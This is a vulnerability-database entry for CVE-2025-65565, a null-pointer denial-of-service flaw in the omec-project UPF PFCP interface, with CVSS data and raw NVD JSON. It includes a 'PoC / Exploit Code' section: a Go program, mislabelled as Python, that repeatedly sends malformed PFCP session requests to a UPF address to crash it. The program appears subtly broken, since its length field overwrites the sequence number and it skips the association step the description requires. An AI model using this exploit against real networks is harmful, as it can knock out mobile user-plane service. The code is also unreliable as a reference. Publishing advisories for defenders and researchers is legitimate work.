Security Vulnerability Report
中文
CVE-2025-65565 CVSS 7.5 HIGH

CVE-2025-65565

Published: 2025-12-18 19:16:34
Last Modified: 2026-01-07 21:06:19
Source: [email protected]

Description

A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association is established, a PFCP Session Establishment Request that is missing the mandatory F-SEID (CPF-SEID) Information Element is not properly validated. The session establishment handler calls IE.FSEID() on a nil pointer, which triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:opennetworking:upf:2.1.3:dev:*:*:*:*:*:* - VULNERABLE
omec-project upf-epc-pfcpiface 2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
package main import ( "bytes" "encoding/binary" "fmt" "net" "time" ) // PFCP IE Types const ( IE_CREATE_PDR = 57 IE_F_SEID = 21 IE_CPF_SEID = 52 IE_NODE_ID = 86 IE_RECOVERY_TIME_STAMP = 151 ) // PFCP Message Types const ( MSG_PFCP_SESSION_ESTABLISHMENT_REQUEST = 0x32 ) // Build malicious PFCP Session Establishment Request without F-SEID func buildMaliciousPFCPPacket(sequenceNum uint32) []byte { var buf bytes.Buffer // PFCP Header // Version (3 bits) | Flags (5 bits) | Message Type (1 byte) | Length (4 bytes) buf.WriteByte(0x20) // Version=1, flags=0 buf.WriteByte(MSG_PFCP_SESSION_ESTABLISHMENT_REQUEST) // Sequence Number (3 bytes) + spare (1 byte) binary.Write(&buf, binary.BigEndian, sequenceNum) buf.WriteByte(0x00) // IE: Node ID (required for association) nodeID := buildIE(IE_NODE_ID, []byte{0x00, 0x00, 0x00, 0x01}) buf.Write(nodeID) // IE: F-SEID - INTENTIONALLY OMITTED to trigger vulnerability // This is the key to exploit CVE-2025-65565 // Calculate and set length msgLen := uint32(buf.Len() - 5) // exclude header's first 5 bytes lenBytes := make([]byte, 4) binary.BigEndian.PutUint32(lenBytes, msgLen) copy(buf.Bytes()[2:6], lenBytes) return buf.Bytes() } func buildIE(ieType uint16, ieData []byte) []byte { var buf bytes.Buffer // IE Type (2 bytes) + Length (2 bytes) + Spare (1 byte) + Data binary.Write(&buf, binary.BigEndian, ieType) binary.Write(&buf, binary.BigEndian, uint16(len(ieData))) buf.WriteByte(0x00) // Spare buf.Write(ieData) return buf.Bytes() } func main() { targetIP := "<UPF_N4_IP>" targetPort := 8805 addr, err := net.ResolveUDPAddr("udp", fmt.Sprintf("%s:%d", targetIP, targetPort)) if err != nil { fmt.Printf("ResolveUDPAddr error: %v\n", err) return } conn, err := net.DialUDP("udp", nil, addr) if err != nil { fmt.Printf("DialUDP error: %v\n", err) return } defer conn.Close() fmt.Println("[*] Sending malicious PFCP Session Establishment Request...") fmt.Println("[*] Target: ", targetIP, ":", targetPort) fmt.Println("[*] Exploit: Missing mandatory F-SEID IE (CVE-2025-65565)") // Send multiple packets to ensure crash for i := 0; i < 10; i++ { packet := buildMaliciousPFCPPacket(uint32(i)) _, err := conn.Write(packet) if err != nil { fmt.Printf("Send error: %v\n", err) return } fmt.Printf("[+] Packet %d sent (length: %d)\n", i+1, len(packet)) time.Sleep(100 * time.Millisecond) } fmt.Println("[*] Attack completed") }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65565", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:34.080", "lastModified": "2026-01-07T21:06:19.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association is established, a PFCP Session Establishment Request that is missing the mandatory F-SEID (CPF-SEID) Information Element is not properly validated. The session establishment handler calls IE.FSEID() on a nil pointer, which triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opennetworking:upf:2.1.3:dev:*:*:*:*:*:*", "matchCriteriaId": "E580395D-12BF-4D0A-AA6F-FD59C36E1EED"}]}]}], "references": [{"url": "https://github.com/omec-project/upf/issues/957", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/omec-project/upf/issues/957", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.